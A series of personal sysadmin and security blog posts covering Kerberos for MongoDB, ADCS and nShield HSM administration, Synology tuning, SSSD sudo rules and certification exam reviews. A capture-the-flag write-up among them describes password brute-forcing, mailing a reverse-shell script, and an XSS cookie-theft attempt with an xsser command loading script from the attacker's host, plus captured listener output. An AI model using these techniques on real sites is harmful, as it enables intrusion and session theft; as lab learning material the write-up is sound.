This creates the m310.keytab file and maps the SPN "mongodb/database.m310.mongodb.university" to the svc-mongo account. The principal is written in the format "service/fullhostname@REALM". The password for the user is also changed and some settings are set pertaining to the used cryptography and Kerberos structures. 

You can verify the SPN's existence with the setspn -Q command. For example:

PS C:\users\Thomas\Documents> setspn -Q mongodb/database.m310.mongodb.university
Checking domain DC=corp,DC=broehaha,DC=nl
CN=svc-mongo,CN=Users,DC=corp,DC=broehaha,DC=nl
       mongodb/database.m310.mongodb.university

Existing SPN found!

 

The m310.keytab file is then copied to the MongoDB server (database.m310.mongodb.university). In my case I use SCP, because I run Mongo on Linux. 

 

On the Linux side:

The m310.keytab file is placed into /etc/, with permissions set to 640 and ownership root:mongod. In order to use the keytab we can set an environment variable: KRB5_KTNAME="/etc/m310.keytab". This can be done in the profile of the user running MongoDB, or on RHEL derivatives in a sysconfig file. 
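For example, something along these lines; the exact file depends on how mongod gets started, and this assumes the service's unit or init script sources /etc/sysconfig/mongod:

# /etc/sysconfig/mongod
KRB5_KTNAME="/etc/m310.keytab"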

We need to set up /etc/krb5.conf with the bare minimum, so the Kerberos client can find the domain:

[libdefaults]
default_realm = CORP.BROEHAHA.NL

[realms]
CORP.BROEHAHA.NL = {
kdc = corp.broehaha.nl
admin_server = corp.broehaha.nl
}

[domain_realm]
.corp.broehaha.nl = CORP.BROEHAHA.NL
corp.broehaha.nl = CORP.BROEHAHA.NL

[logging]
default = FILE:/var/log/krb5.log

 

Speaking of finding the domain, there are a few crucial things that need to be set up correctly!

With that out of the way, we can start making sure that MongoDB knows about my personal user account. If the Mongo database does not yet have any user accounts set up, then we'll need to use the "localhost bypass" so we can set up a root user first. Once there is an administrative user, run MongoD in normal authorization-enabled mode. For example, again the barest of bare minimums:

mongod --auth --bind_ip database.m310.mongodb.university --dbpath /data/db

 

You can then connect as the administrative user so you can setup the Kerberos account(s):

mongo --host database.m310.mongodb.university:27017 --authenticationDatabase admin --username root --password
MongoDB> use $external
MongoDB> db.createUser({user:"tess@CORP.BROEHAHA.NL", roles:[{role:"root",db:"admin"}]})

 

And with that out of the way, we can now actually use Kerberos auth. We'll restart MongoD with Kerberos enabled, at the same time disabling the standard Mongo password authentication and thus locking out the root user we used above. 

mongod --auth --bind_ip database.m310.mongodb.university --setParameter authenticationMechanisms=GSSAPI --dbpath /data/db

 

We can then request a Kerberos ticket for my own account, start a Mongo shell and authenticate inside Mongo as myself:

root@database:~# kinit tess@CORP.BROEHAHA.NL -V
Using default cache: /tmp/krb5cc_0
Using principal: tess@CORP.BROEHAHA.NL
Password for tess@CORP.BROEHAHA.NL:
Authenticated to Kerberos v5

root@database:~# mongo --host database.m310.mongodb.university:27017
MongoDB shell version: 3.2.21
connecting to: database.m310.mongodb.university:27017/test

MongoDB Enterprise > use $external
switched to db $external

MongoDB Enterprise > db.auth({mechanism:"GSSAPI", user:"tess@CORP.BROEHAHA.NL"})
1

 

HUZZAH! It worked!

Oh right!.. What was the thing that took me hours of troubleshooting? Initially I ran MongoD without the --bind_ip option to tie it to the external IP address and hostname. I was running it on localhost. :( And thus the MongoD process identified itself to the KDC as mongodb/localhost. It never showed that in any logging, so that's why I missed it. I had assumed that simply passing the keytab file was enough to authenticate.

 

Sources:


kilala.nl tags: , ,

View or add comments (curr. 0)

Query ADCS (Active Directory Certificate Services) for certificate details

2018-11-01 18:44:00

I think Microsoft's ADCS is quite a nice platform to work with, as far as PKI systems go. I've heard people say that it's one of the nicest out there, but given its spartan interface that kind of makes me worry for the competitors! One of the things I've fought with, was querying the database backend, to find certificates matching specific details. It took me a lot of Googling and messing around to come up with the following examples.

 

To get the details of a specific request:

certutil -view -restrict "requestid=381"

 

To show all certificate requests submitted by myself:

certutil -view -restrict "requestername=domain\t.sluijter"

 

To show all certificates that I requested, displaying the serial numbers, the requestor's name and the CN on the certificate. It'll even show some statistics at the bottom:

certutil -view -restrict "requestername=domain\t.sluijter" -out "serialnumber,requestername,commonname"

 

Show all certificates provided to TESTBOX001. The query language is so unwieldy that you'll have to ask for "hosts >testbox001 and <testbox002".

certutil -view -restrict "commonname>testbox001,commonname<testbox002" -out "serialnumber,requestername,commonname"

 

A certificate request's disposition will show you errors that occurred during submission, but it'll also show other useful data. Issued certificates will show who approved the issuance. The downside to this is that the approver's name will disappear once the certificate is revoked. So you'll need to retain the auditing logs for ADCS!

certutil -view -restrict "requestid=381" -out "commonname,requestername,disposition,dispositionmessage"    

certutil -view -restrict "requestid=301" -out "commonname,requestername,disposition,dispositionmessage"    

 

Would you like to find out which certificate requests I approved? Then we'll need to add a bit more Powershell.

certutil -view -out "serialnumber,dispositionmessage" | select-string "Resubmitted by DOMAIN\t.sluijter"

 

Or even better yet:

certutil -view -out "serialnumber,dispositionmessage" | ForEach {

    if ($_ -match "^.*Serial Number:"){$serial = $_.Split('"')[1]}

    if ($_ -match "^.*Request Disposition Message:.*Resubmitted by DOMAIN\t.sluijter"){ Write-Output "$serial" }

    }

 

Or something very important: do you want to find certificates that I both requested AND approved? That's a bad situation to be in...

certutil -view -restrict "requestername=domain\t.sluijter" -out "serialnumber,dispositionmessage" | ForEach {

    if ($_ -match "^.*Serial Number:"){$serial = $_.Split('"')[1]}

    if ($_ -match "^.*Request Disposition Message:.*Resubmitted by DOMAIN\t.sluijter"){ Write-Output "$serial" }

    }

 

If you'd like to take a stab at the intended purpose for the certificate and its keypair, then you can take a gander at the template fields. While the template doesn't guarantee what the cert is for, it ought to give you an impression. 

certutil -view -restrict "requestid=301" -out "commonname,requestername,certificatetemplate"


kilala.nl tags: , , ,

View or add comments (curr. 0)

Another quarter, another beta

2018-10-05 21:07:00

I took the CompTIA Linux+ beta (XK1-004) today and I wasn't very impressed... It's "ok".

I have no recent experience with LPIC or with the previous version of Linux+; my only LPIC experience dates back ten years. Based on that I feel that the new Linux+ is less... exciting? thrilling? than what I'd expect from LPIC. It feels to me like a traditional junior-level Linux exam with its odd fascination with tar, but with modern subjects (like Git or virtualization) tacked on the side.

Personally I disliked one of the PBQs, with a simulated terminal. This simulation would only accept the exact, literal command and parameter combinations that have been programmed into it. Anything else, any other permutation of flags, results in the same error message. Imagine my frustration when a command that I run almost daily to solve the question at hand was not accepted, because I wasn't using the exact flags, in the exact order, that they wanted me to type. 

Anyway. I'm glad that I took the beta, simply to get more feeling of the (international) market place. Now at least I'll know what the cert entails, should I ever see it on an applicant's resumé. :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Passed the PenTest+ beta exam!

2018-07-31 21:29:00

A bit over three months ago, I took part in CompTIA's beta version of the PenTest+ exam. It was a fun and learning experience and despite having some experience, I didn't expect to pass. 

Turns out, I did! I passed with an 821 out of 900 score :D 

Now, I hope that some of the feedback I provided has been useful. That's the point of those beta exams, isn't it?


kilala.nl tags: , ,

View or add comments (curr. 1)

CFR-310 beta exam experience

2018-07-17 22:08:00

I guess I've found a new hobby: taking beta-versions of cybersec certification exams. :)

Three months ago I took the CompTIA Pentest+ beta and not half an hour ago I finished the CertNexus CFR-310 beta. Like before, I learned about the beta-track through /r/netsecstudents where it was advertised with a discount code bringing the $250 exam down to $40 and ultimately $20. Regardless of whether the certification has any real-world value, that's a nice amount to spend on some fun!

To sum up my experience:

Now... Is the CFR-310 certification "worth it"? As I've remarked on Peerlyst earlier this week: it depends.

If you have a specific job requirement to pass this cert, then yes it's obviously worth it. Then again, most likely your employer or company will spring for the exam and it won't be any skin off your back. And if you're a forward thinking contractor looking to get assignments with the DoD, then it could certainly be useful to sit the exam as it's on the DoD 8570 list for two CSSP positions.

If, like me, you're relatively free to spend your training budget and you're looking for something fun to spend a few weeks on, then I'd suggest you move on to CompTIA's offerings. CertNexus / Logical Operations are not names I'd heard before, while CompTIA has been a household name in IT for years. 


kilala.nl tags: , ,

View or add comments (curr. 1)

Synology vagueries: slow transfers, 100% volume util, very high load average, very high IOWAIT

2018-06-28 22:30:00

I've been a very happy user of Synology systems for quite a few years now. The past few weeks I've run into quite a few performance issues though, so I decided to get to the bottom of it.

Symptoms:

I have undertaken a few steps that seem to have gotten me in the right direction...

  1. I have gone over the list of active services and disabled the ones I do not use.
  2. I verified the installed packages and I've removed all the things I really don't need.
  3. I have disabled the Universal Search function, which cannot be disabled without trickery (see below).
  4. I have disabled the Indexing daemon in full, which also cannot be disabled without extra effort (also below).

In order to disable Universal Search:

  1. Login through SSH
  2. cd /var/packages/SynoFinder
  3. sudo cp INFO INFO.orig
  4. sudo vi INFO

Make the following changes:

ctl_stop="yes"
ctl_uninstall="yes"

You can now restart Package Center in the GUI, browse to Universal Search / SynoFinder and stop the service. You could even uninstall it if you like.

In order to disable the Indexer daemon:

  1. Login through SSH
  2. sudo synoservice --hard-stop synoindexd
  3. sudo synoservice --disable synoindexd

The second step is needed to also stop and disable the synomkthumb and synomkflvd services, which rely upon the synoindexd.

One reboot later and things have quieted down. I'll keep an eye on things the next few days.


kilala.nl tags: ,

View or add comments (curr. 5)

Keywords for this week: Windows, Linux, PKI and DAMTA

2018-06-24 20:41:00

It's gonna be a busy week! 

Most importantly, I'll be taking CQure's "DAMTA" training: Defense Against Modern Targeted Attacks. Basically, an introduction to threat hunting and improved Blue Teaming. Sounds like it's going to be a blast and I'm looking forward to it a lot :)

Unfortunately this also means I'll be gone from the office at $CLIENT for three days; that bites, 'cause I'm in the midst of a lot of PKI and security-related activities. To make sure I don't fall behind too much I'm running most of my experiments in the evenings and weekends. 

For example, I've spent a few hours this weekend on setting up a Microsoft ADCS NDES server, which integrates with my Active Directory setup and the base ADCS. My Windows domain works swimmingly, but now it's time to integrate Linux. Now I'm looking at tools like SSCEP and CertMonger to get the show on the road. To make things even cooler, I'll also integrate both my Kali and my CentOS servers with AD. 

Busy, busy, busy :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Handy tool to troubleshoot your Microsoft ADCS PKI

2018-06-23 14:08:00

Doesn't look like much, but it's great

It has been little over a year now since I started at $CLIENT. I've learned so many new things in those twelve months, it's almost mindboggling. Here's how I described it to an acquaintance recently:

"To say that I’m one lucky guy would be understating things. Little over a year ago I was interviewed to join a project as their “pki guy”: I had very little experience with certificates, had messed around a bit with nShield HSMs, but my customer was willing to take a chance on me. ... ... A year onwards I’ve put together something that I feel is pretty sturdy. ... We have working DTAP environments, the production environment’s been covered with a decent keygen ceremony and I’m training the support crew for their admin-tasks. There’s still plenty of issues to iron out, like our first root/issuing CA renewal in a few weeks, but I’m feeling pretty good about it all."

As I described to them, I feel that I'm at a 5/10 right now when it comes to PKI experience. I have a good grasp of the basics, I understand some of the intricacies, I've dodged a bunch of pitfalls and I've come to know at least one platform.

How little I know about this specific platform (Microsoft's Active Directory Certificate Services) gets reinforced frequently, for example by stumbling upon Brian Komar's reply to this thread. The screenshot above might not look like much, but it made my day yesterday :) "Pkiview.msc" you say? It builds a tree-view of your PKI's structure on the lefthand side and on the right side it will show you all the relevant data points for each CA in the list. 

This is awesome, because it will show you immediately when one of your important pieces of meta-data becomes unavailable. For example, in the PKI I built I have a bunch of clones of the CRL Distribution Point (CDP) spread across the network. Oddly, these clones were lighting up red in the pkiview tool. Turns out that the cloning script had died a while back, without any of us noticing. 
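As an aside: if you'd rather do a similar health check from the command line, certutil can fetch and validate all CDP/AIA URLs for a given certificate. Take any certificate issued by the CA (the file name below is just a placeholder) and run:

certutil -verify -urlfetch issued-cert.cer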

So yeah, it may not look like much, but that's one great troubleshooting tool :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Inventory of certificates, private keys and nShield HSM kmdata files

2018-05-22 18:54:00

Building on my previous Thales nShield HSM blog post, here's a nice improvement.

If you make an array with (FQDN) hostnames of HSM-clients you can run the following Powershell script on your RFS-box to traverse all HSM-systems so you can cross-reference their certs to the kmdata files in your nShield RFS.

$Hosts = "host1","host2","host3"

ForEach ($TargetHost in $Hosts)
{
    Invoke-Command -ComputerName $TargetHost -ScriptBlock {
        $Thumbs = Get-ChildItem cert:\LocalMachine\My
        ForEach ($TP in $Thumbs.thumbprint) {
            $BLOB = (certutil -store My $TP);
            $HOSTNAME = (hostname);
            $SUBJ = ($BLOB | Select-String "Subject:").ToString().Replace("Subject: ","");
            $CONT = ($BLOB | Select-String "Key Container =").ToString().Replace("Key Container = ","").Replace(" ","");
            Write-Output "$HOSTNAME $TP ""$SUBJ"" ""$CONT""";
        }
    }
}

$KeyFiles = Get-ChildItem 'C:\ProgramData\nCipher\Key Management Data\Local\key_caping*'
ForEach ($KMData in $KeyFiles) {
    $CONT = (kmfile-dump -p $KMData | Select -First 7 | Select -Last 1)
    Write-Output "$KMData $CONT";
}

 

For example, the output of the script above would look like this:

TESTBOX F34F7A37C39255FA7E007AE68C1FE3BD92603A0D "CN=testbox, C=thomas, C=NL" "ThomasTest"

C:\ProgramData\nCipher\Key Management Data\Local\key_caping_machine--a45b47a3cee75df2fe462521313eebe9ef5ab4                    ThomasTest

 

The first line is for host TESTBOX and shows the testbox certificate, with a link to the ThomasTest container. The second line shows the specific kmdata file that is tied to the ThomasTest container. Nice :)


kilala.nl tags: , , ,

View or add comments (curr. 0)

Matching Windows certificates to nShield protected keys (kmdata)

2018-05-22 18:39:00

Over the past few weeks I've had a nagging question: Windows certutil / certlm.msc has an overview of the active certificates and key pairs for a computer system, but when your keys are protected by a Thales nShield HSM you can't get to the private keys. Fair enough. But then there's the %NFAST_KMDATA% directory on the nShield RFS-server, whose local subdirectory contains all of the private keys that are protected by the HSM. And I do mean all the key materials. And those files are not marked in easy to identify ways. 

So my question? Which of the files in %NFAST_KMDATA%\local ties to which certificate on which HSM-client?

I've finally figured it all out :) Let's go to Powershell!

 

PS C:\Windows\system32> cd cert:\LocalMachine\My

PS Cert:\LocalMachine\My> dir
   Directory: Microsoft.PowerShell.Security\Certificate::LocalMachine\My

Thumbprint                                Subject
----------                                -------
F34F7A37C39255FA7E007AE68C1FE3BD92603A0D  CN=testbox, C=thomas, C=NL
...

 

So! After moving into the "Personal" keystore for the local system you can see all certs by simply running dir. This will show you both the thumbprint and the Subject of the cert in question. Using the Powershell Format-List command will show you the interesting meta-info (the example below has many lines removed).

 

PS Cert:\LocalMachine\My> dir F34F7A37C39255FA7E007AE68C1FE3BD92603A0D | fl *
...
DnsNameList              : {testbox}
...
HasPrivateKey            : True
PrivateKey               :
PublicKey                : System.Security.Cryptography.X509Certificates.PublicKey
SerialNumber             : 6FE2C038ED73E7A0469E5E3641BD3690
Subject                  : CN=testbox, C=thomas, C=NL

 

Cool! Now, the HasPrivateKey and PrivateKey lines are interesting, because the system tells you that it does have access to the relevant private key, but it does not have clear information as to where this key lives. We can turn to the certutil tool to find the important piece of the puzzle: the key container name.

 

PS Cert:\LocalMachine\My> certutil -store My F34F7A37C39255FA7E007AE68C1FE3BD92603A0D
...
Serial Number: 6fe2c038ed73e7a0469e5e3641bd3690
Subject: CN=testbox, C=thomas, C=NL
 Key Container = ThomasTest
 Provider = nCipher Security World Key Storage Provider
Private key is NOT exportable
... 

Again, the Key Container and Provider lines are the interesting ones. They show that the private key is accessible through the Key Storage Provider (KSP) "nCipher Security World KSP" and that the relevant container is named "ThomasTest". This name is confirmed by the nShield command to list your keys:

 

PS Cert:\LocalMachine\My> cnglist --list-keys
ThomasTest: RSA machine
...

 

Now comes the tricky part: the key management data files (kmdata) don't have a filename tying them to the container names:

 

PS Cert:\LocalMachine\My> cd 'C:\programdata\nCipher\Key Management Data\Local'

PS C:\programdata\nCipher\Key Management Data\Local> dir
...
-a---        27-12-2017     14:03       5336 key_caping_machine--...
-a---        27-12-2017     14:03       5336 key_caping_machine--...
-a---        27-12-2017     11:46       5336 key_caping_machine--...
-a---         15-5-2018     13:37       5188 key_caping_machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4...

 

So, let's try an old-fashioned grep shall we? :)

 

PS C:\programdata\nCipher\Key Management Data\Local> Select-String thomastest *caping_*
key_caping_machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4:2:   ThomasTest  ?   ∂   Vu ?{?%f?&??)?U;?m???   ??  ??  ??  1???B'?????'@??I?MK?+9$KdMt??})???7?em??pm?? ?

 

This suggests that we could inspect the kmdata files and find out their key container name. 

 

PS C:\programdata\nCipher\Key Management Data\Local> kmfile-dump -p key_caping_machine--a45b47a3cee75df2fe462521313eebe9ef5ab4
key_caping_machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4
 AppName
       caping
 Ident
       machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4
 Name
       ThomasTest
...

SHAZAM! 

Of course we can also inspect all the key management data files in one go:

 

PS C:\> $Files = Get-ChildItem 'C:\ProgramData\nCipher\Key Management Data\Local\key_caping*'

PS C:\> ForEach ($KMData in $Files) { kmfile-dump -p $KMData | Select -First 7 }
C:\ProgramData\nCipher\Key Management Data\Local\key_caping_machine--a45b47a3cee75df2fe462521313eebe9ef5ab4
 AppName
       caping
 Ident
       machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4
 Name
       ThomasTest

 


kilala.nl tags: , ,

View or add comments (curr. 0)

Microsoft OCSP Responders, nShield HSMs and vagueries

2018-05-17 20:18:00

Over the past few months I've built a few PKI environments, all based on Microsoft's ADCS. One of the services I've rolled out is the Microsoft OCSP Responder Array: a group of servers working together to provide OCSP responses across your network. 

I've run into some weirdness with the OCSP Responders, when working with the Thales / nCipher nShield HSMs. For example, the array would consist of a handful of slaves and one master server. Everything'd be running just fine for a week or so, until it's time to refresh the OCSP signing certificates. Then, one out of the array starts misbehaving! All the other nodes are fine, but one of'm just stops serving responses. 

The Windows Event Log contains error codes involving "CRYPT_E_NO_PROVIDER", "NCCNG_NCryptCreatePersistedKey existing lock file" and "The Online Responder Service could not locate a signing certificate for configuration XXXX. (Cannot find the original signer)". Now that second one is a big hint!

I haven't found out why yet, but the problem lies in lock files within the HSM's security world. If you check %NFAST_KMDATA%\local you'll find a file with "lock" at the end of its name. Normally when requesting a keypair from the HSM, a temporary lock is created which gets removed once the keypair is provided. But for some reason the transaction doesn't finish and the lock file stays in place.

For now, the temporary solution is the following (a quick PowerShell sketch follows below the list):

  1. Stop the Online Responder Service.
  2. Remove the lock file from %NFAST_KMDATA%\local.
  3. Restart the Online Responder Service.
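A minimal sketch of that workaround, assuming the Online Responder's service short name is OCSPSvc (double-check with Get-Service) and that %NFAST_KMDATA% is defined as an environment variable on the responder:

Stop-Service OCSPSvc
Get-ChildItem "$env:NFAST_KMDATA\local" -Filter "*lock" | Remove-Item    # clean up the stale lock file(s)
Start-Service OCSPSvc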

With that out of the way, here's two other random tidbits :)

In some cases the service may throw out errors like "Online Responder failed to create an enrollment request" in close proximity to "This operation requires an interactive window station". This happens when you did not set up the keys to be module-protected. The service is asking your HSM for its keys and the HSM is in turn asking you to provide a quorum of OCS (operator cards). If you want the Windows services to auto-start at boot time, always set their keys up as "module protected". And don't forget to run both capingwizard64.exe and domesticwizard64.exe to set this as the default as well!

Finally, from this awesome presentation which explains common mistakes when building an AD PKI: using certutil -getreg provides boatloads of useful information! For example, in order for OCSP responses to be properly signed after rolling over your keypairs, you'll need to run certutil -setreg ca\UseDefinedCACertInRequest 1.

(Seriously, Mark Cooper is a PKI wizard!)


kilala.nl tags: , ,

View or add comments (curr. 0)

CompTIA PenTest+ experience

2018-04-16 12:55:00

I've taken the day off, despite things being quite busy at the office, to have a little fun. Specifically, I've just arrived back home after sitting the CompTIA PenTest+ Beta exam. Taking an exam for fun? Absolutely :)

It's no surprise that I first heard about the newly developed exam on Reddit, with the CompTIA team calling for 400 people to take the beta-version of the exam. We're not getting any scores yet, as they'll first tally all the outcomes to determine weaknesses and flaws in questions that may affect scoring negatively. But once the process has completed, if (and that's an IF) you passed you'll gain full accreditation for the cert. All that and a fun day, for just $50? Sign me up :)

Being a non-native English speaker I was given an extension, tackling 110 questions in 220 minutes (instead of 165). That was certainly doable: I got up from my seat with two hours gone. Overall I can say that my impression of the exam is favorable! While one or two specific topics may have stolen the limelight, I can say that my exam covered a diverse array of subjects. The "simulation" questions as they call them were, ehh, okay. They're not what I would call actual simulations, they're more like interactive screens, but I do feel they added something to the experience. 

Yeah! Not bad at all! I would heartily endorse this certification track instead of EC Council's CEH. The latter may have better brand-recognition in EMEA, but CompTIA is still known as a respectable organization. 

So, did I pass? I don't know :) As I said, the subject matter turned out to be very diverse, in a very good way. Thus it also covered things I have zero to very little experience with, while an experienced pen-tester would definitely know. And that's the point: despite passing the OSCP exam last year, I -am- still a newbie pen-tester. So if I fail this exam, then I'll feel that it's a justified failure. 


kilala.nl tags: ,

View or add comments (curr. 2)

Cincero CTF036 - 2018 edition

2018-04-01 13:16:00

The battlegrounds

Image credits go to Cincero, who took photos all day.

Another year, another CTF036! No longer under the Ultimum flag, but this time organised by Cincero / Secured by Design. Same awesome people, different company name. The 2016 and 2017 editions were awesome and this year's party lived up to its fame.

As is tradition, the AM was filled with presentations. I was invited to talk as well, but I didn't have anything presentable ready to go; maybe next year! It was a busy day, and Wesley kicked off with DearBytes' findings about the security of home automation systems. Good talk, which had my colleague Dirk's attention because his home is pretty heavily filled with that stuff ;)

Dick and I would be teaming up under the Unixerius flag. Lunch was sorted pretty quickly, so we set up our systems around 12:30. Between us two we had three laptops, with my burner laptop serving as Google-machine through my mobile data connection (the in-house Internet connection wasn't very fast). The case was consistent with the last few years: a description of the target, an explanation why we were hacking their servers and a few leads to get us started. To sum it up:

First order of business: slurp down anything the DNS would give us (a successful zone transfer showed just the four systems, spread across two ranges) and run some port scans against the front two boxen. Results?

While perusing the website, we found a number of valid email addresses for employees to try on Squirrelmail. After going over my old OSCP notes, Dick put together a userlist and got to work with Hydra in hopes of brute-forcing passwords for their accounts. This is where the basic Kali stuff isn't sufficient: there are no wordlists for Dutch targets :) While rockyou.txt is awesome, it won't contain famous passwords such as Welkom01, Maandag2018, Andijvie18 and so on. It's time to start putting together a set of rules and wordlists for Dutch targets! In the end we got into two mailboxes, which got us another seven cards: 140 points. 
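About that Dutch wordlist: the idea is simple enough to sketch. Purely as an illustration (shown in PowerShell because that's what most snippets on this site are in; a bash loop works just as well, and the words and suffixes below are just guesses):

$words    = "welkom","maandag","zomer","winter","lente","herfst","andijvie"
$suffixes = "01","123","2017","2018","!","2018!"
$candidates = ForEach ($w in $words) {
    $cap = $w.Substring(0,1).ToUpper() + $w.Substring(1)    # welkom -> Welkom, maandag -> Maandag, ...
    ForEach ($s in $suffixes) { "$cap$s" }
}
$candidates | Set-Content dutch-wordlist.txt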

Unfortunately we didn't get any points beyond that, despite trying a lot of avenues!

Open SMB shares: Dirk suspected there was more to the open SMB shares, so he focused on those. Turning to Metasploit and others, he hoped to perform a SMB relay attack using the MSF tooling. Michael later confided that EternalBlue would not work (due to patching), but that the SMB redir was in fact the way to go. Unfortunately Dick couldn't get this one to work; more troubleshooting needed. 

Squirrelmail REXEC: Dick noticed that the Squirrelmail version was susceptible to a remote command execution vulnerability. Unfortunately, after quite a bit of trying he concluded that this particular install had been patched. Darn!

Mailing a script: In his own presentation Michael had stressed the importance of simulating human interaction in a CTF, be it through automation or by using a trainee ;) After the rather hamfisted hints in the Squirrelmail boxes we'd opened, Dick decided to look for a Powershell reverse-shell script and to mail it to the guy waiting for "a script to run". Not one minute before the final bell of the CTF did he get a reverse session! It didn't count for points, but that was a nice find of him. 

SQLi in the site: I ran the excellent SQLMap against all forms and variables that I could find in the site. No inroads found. 

XSS in the site: Michael pointed out that one variable on the site should catch my eye, so I went over it all again. Turns out that hoedan.php?topic= is susceptible to cross-site scripting. This is where I needed to start learning, because I'm still an utter newb at this subject. I expected some analogue of SQLMap to exist for XSS and I wasn't wrong! XSSER is a great tool that automates hunting for XSS vulnerabilities! Case in point:

xsser -u "http://www.pay-deal.nl" -g "/hoedan.php?topic=XSS" --auto --Fr "https://172.18.9.8/shell.js"
...
===========================================
[*] Final Results:
===========================================
- Injections: 558
- Failed: 528
- Sucessfull: 30
- Accur: 5 %

Here's a great presentation by the author of XSSER: XSS for fun and profit.

This could be useful! Which is why I tried a few avenues. Using XSSER, Metasploit and some manual work I determined that the XSS wouldn't allow me to run SQL commands, nor include any PHP. Javascript was the thing that was going to fly. Fair enough. 

Now, that website contained a contact form which can be used to submit your own website for inclusion in the payment network. Sounds like a great way to get a "human" to visit your site. 

Browser_autopwn: At first, I used SEToolkit and MSF to run attacks like browser_autopwn2, inserting my own workstation's webserver and the relevant URL into the contact form. I certainly got visits and after some tweaking determined that the user came from one of the workstations and was running FireFox 51. Unfortunately, after trying many different payloads, none of them worked. So no go on pwning the browser on the workstation. 

Grabbing dashboard cookies: Another great article I found helped me get on the way with this one: From reflected XSS to shell. My intention was to have the pay-deal administrator visit their own site (with XSS vuln), so I could grab their cookie in hopes of it having authentication information in there. Basically, like this:

http://www.pay-deal.nl/hoedan.php?topic=Registreren”>

While the attack worked and I did get a cookie barfed onto my Netcat listener, it did not contain any authenticating information for the site:

===========================================
connect to [172.18.9.8] from (UNKNOWN) [172.18.8.10] 55469
GET / HTTP/1.1
Host: 172.18.9.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
=========================================== 

Turns out I probably did something wrong, because according to Michael's post-CTF talk this was indeed the inroad to be taken: grab the admin's cookie, login to the dashboard, grab more credit cards and abuse the file upload tool for more LFI fun! Similarly, Dick's attempts at the SMB relay should have also given him inroads to attack the box. We were well on our way, after a bunch of hints. So, we're still pretty big newbs :D

It was an awesome day! I wish I had more spare time, so I could continue the PWK/OSCP online labs and so I could play around with HackTheBox and VulnHub.

EDIT: Here's a great SANS article explaining SMB relay in detail.


kilala.nl tags: , ,

View or add comments (curr. 0)

Back in the saddle: CompTIA PenTest+

2018-03-25 20:54:00

It's been a few months since I last took a certification exam: I closed last year with a speed-run of RedHat's EX413, which was a thrill. Since then, I've taken some time off: got into Civ6, read a few books, caught up on a few shows. But as some of my friends will know, it's never too long before I start feeling that itch again... Time to study!

A few weeks back I learned of the new CompTIA PenTest+ certification. They advertised their new cert with a trial run for the first 400 takers. A beta-test of an exam for $50?! I'm game! Sounds like a lot of fun!

Judging by the reactions on TechExams and Reddit, the test is hard to pin down. CompTIA themselves boast "a need for practical experience", while also providing a VERY extensive list of objectives. Seriously, the list is huge. Reports from test-takers are also all over the place: easy drag-and-drop "simulations", large swathes of multiple-choice questions, a very large focus on four of the big names in scripting, "more challenging than I had expected", or "what CEH should have been".

As for me, my test is booked for 16/04. I don't fully know what to expect, but I intend to have fun! In the mean time I'm using the large list of objectives to simply learn more about the world of pentesting. My OSCP certification suggests that I at least understand the basics, but mostly it's shown me how much I don't know :) 


kilala.nl tags: ,

View or add comments (curr. 0)

PasswordState, Active Directory and Sudo: oh my!

2018-01-10 20:14:00

Recently I've gone over a number of options for connecting a Linux environment to an existing Active Directory domain. I won't go into the customer's specifics, but after considering Winbind, SSSD, old school LDAP and commercial offerings like PBIS we went with the modern-yet-free SSSD-based solution. The upside of this approach is that integration is quick and easy. Not much manual labor needed at all. 

What's even cooler, is that SSSD supports sudoers rulesets by default!

With a few tiny adjustments to your configuration and after loading the relevant schema into AD, you're set to go! Jakub Hrozek wrote instructions a while back; they couldn't be simpler!
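The gist of those adjustments, as far as I remember them (double-check Jakub's write-up for your distro and SSSD version; the domain section name below is a placeholder), is to have SSSD serve sudo rules and to point sudo's lookups at SSSD:

# /etc/sssd/sssd.conf
[sssd]
services = nss, pam, sudo

# (in your existing AD domain section)
[domain/example.com]
sudo_provider = ad

# /etc/nsswitch.conf
sudoers: files sss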

So now we have AD-based user logins and Sudo rules! That's pretty neat, because not only is our user management centralized, so is the full administration of Sudo! No need to manage /etc/sudoers and /etc/sudoers.d on all your boxen! Config management tools like Puppet or Ansible might make that easier, but one central repo is even nicer! :D

 


 

Now, I've been working with the PasswordState password management platform for a few weeks and so far I love it. Before getting the logins+Sudo centralized, getting the right privileged accounts on the Linux boxen was a bit of a headache. Well, not anymore! What's even cooler, is that using Sudo+LDAP improves upon a design limitation of PasswordState!

Due to the way their plugins are built, Click Studios say you need -two- privileged accounts to manage Linux passwords (source, chapter 14). One that has Defaults:privuser rootpw in sudoers and one that doesn't. All because of how the root password gets validated with the heartbeat script. With Sudoers residing in LDAP this problem goes away! I quote (from the sudoers.ldap man-page):

It is possible to specify per-entry options that override the global default options. /etc/sudoers only supports default options and limited options associated with user/host/commands/aliases. The syntax is complicated and can be difficult for users to understand. Placing the options directly in the entry is more natural.

Would you look at that! :) That means that, per the current build of PasswordState, the privileged user for Linux account management needs the following three sudoers entries in AD / LDAP. 

CN=pstate-ECHO,OU=sudoers,OU=domain,OU=local:
sudoHost = ALL
sudoCommand = /usr/bin/echo
sudoOption = rootpw
sudoUser = pstate

CN=pstate-PASSWDROOT,OU=sudoers,OU=domain,OU=local:
sudoHost = ALL
sudoCommand = /usr/bin/passwd root
sudoOption = rootpw
sudoOrder = 10
sudoUser = pstate

CN=pstate-PASSWD,OU=sudoers,OU=domain,OU=local:
sudoHost = ALL
sudoCommand = /usr/bin/passwd *
sudoUser = pstate

The "sudo echo" is used to validate the root password (because the rootpw option is applied). I only applied the rootpw option to "sudo passwd root" to maintain compatibility with the default script included with PasswordState


kilala.nl tags: , ,

View or add comments (curr. 1)

EX413: it's been one heck of a ride!

2017-11-01 20:39:00

2017-11-02: Updates can be found at the bottom.

Five weeks ago, I started a big challenge: pass the RedHat EX413 "Certificate of Expertise" in Linux server hardening. I've spent roughly sixty hours studying and seven more on the exam, but I've made it! As this post's title suggests it's been one heck of a ride!

Unfortunately, that's not just because of the hard work. 

